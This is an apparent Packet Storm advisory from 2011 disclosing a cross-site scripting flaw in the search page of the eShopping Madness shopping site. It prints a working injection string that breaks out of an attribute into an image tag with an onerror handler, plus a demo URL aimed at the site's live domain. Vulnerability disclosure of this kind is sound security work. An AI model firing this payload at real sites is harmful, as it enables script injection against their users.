eShopping Madness Cross Site Scripting

2011-08-23T00:00:00
ID PACKETSTORM:104357
Type packetstorm
Reporter Eyup CELIK
Modified 2011-08-23T00:00:00

Description

                                        
                                            `# Exploit Title: eShopping Madness Stored XSS  
# Date: 2011  
# Author: Eyup CELIK  
# Version: All Version  
# Tested on: All versions are Vulnerability  
  
ISSUE  
  
Cross Site Scripting can be done using the command input  
  
Vulnerable Page:  
search.php (Search Modules)  
  
Exploit:  
"/></a></><img src=1.gif onerror=alert(1)>  
  
Demo:  
http://www.eshoppingmadness.com/search.php?s=%22%2F%3E%3C%2Fa%3E%3C%2F%3E%3Cimg+src%3D1.gif+onerror%3Dalert%281%29%3E  
  
  
Thanks,  
  
  
Eyup CELIK  
Bilgi Teknolojileri Güvenlik Uzmani  
http://www.eyupcelik.com.tr  
`